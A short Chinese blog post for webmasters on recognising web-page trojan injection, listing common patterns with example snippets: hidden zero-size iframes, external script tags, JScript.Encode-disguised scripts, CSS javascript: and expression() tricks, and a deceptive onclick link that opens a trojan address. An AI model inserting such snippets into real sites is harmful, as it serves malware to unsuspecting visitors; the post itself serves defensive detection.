互联网还只是在初级阶段»

«浅谈网页挂马

    网页被挂马是最让站长头痛的一件事情，因为这说明已经有骇客拥有了你的网站的操作权限，面对这种情况，首先如果是虚拟主机用户应当积极与服务商联系运行查杀工具，彻底清除恶意代码和后门；而如果你拥有自己的主机，则应当积极检查程序是否有漏洞并立即升级到最新的补丁。所以作为站长就应当最早的发现网页被挂马的代码，下面是一些比较常见的挂马方式：

    (一)Iframe框架挂马

    这种挂马方式比较多，主要是以下这种格式：“<iframe src=木马地址 width=0 height=0></iframe>”，width=0和height=0是为了隐藏框架。

    (二)Script挂马

    与Iframe挂马平级，也比较常见，主要是以下这种格式："<script src=木马地址></script>"，当然也可以演变为Iframe挂马，"<script>document.write('<iframe src=木马地址 width=0 height=0></iframe>')</script>"。

    附上一张石头博客被Script挂马的截图：

    (三)Js加密变相挂马

    这种挂马方式与Script挂马差不多，惟一不同的就是使用了Encode隐藏了源JS的后缀，但同样可以达到执行代码的目的，主要是以下这种格式：“<script language='JScript.Encode' src=http://www.xxx.com/a.txt></script>”虽然表面上看只是引用了一个txt文件，但是依然可以顺利执行其中的代码。

    (四)Css挂马

    Css挂马主要是在Css文件中引用外部Js文件来实现。主要是以下这种格式：

 

body {background: url('javascript:document.write("<script src=木马地址>;</script>")')} 

 

     或者引用Css中的expression来实现执行Js的方式，比如：

a {start:expression(document.write('<script src=木马地址></script>'))}

    (五)高级欺骗挂马

    这种挂马方式与一般不同的在于它会用正规的网站来迷惑用户，在一次正常点击的同时，也达到执行木马代码的目的。以下是一个比较简单的例子：

<a href="/" Onclick="Do()">网站首页</a>

<script>function Do(){window.open("木马地址","网站首页")}</script>

     通过代码可以看出：虽然是一个比较正常的访问首页的链接，但是却在点击的同时激活了木马运行的函数，这样的挂马方式比较有迷惑性，如果你不具备基础的html和javascript知识就很难发现。

    网页挂马的方式千变万化，以上只是比较有代表性的挂马方式，要真正做到及时发现挂马代码就就当对网站源代码中的外部文件小心留神，因为除开你自己熟悉的外部调用文件外，其它外部文件就完全可以是木马！大家有其它被挂马方式的不防说说和大家一起分享。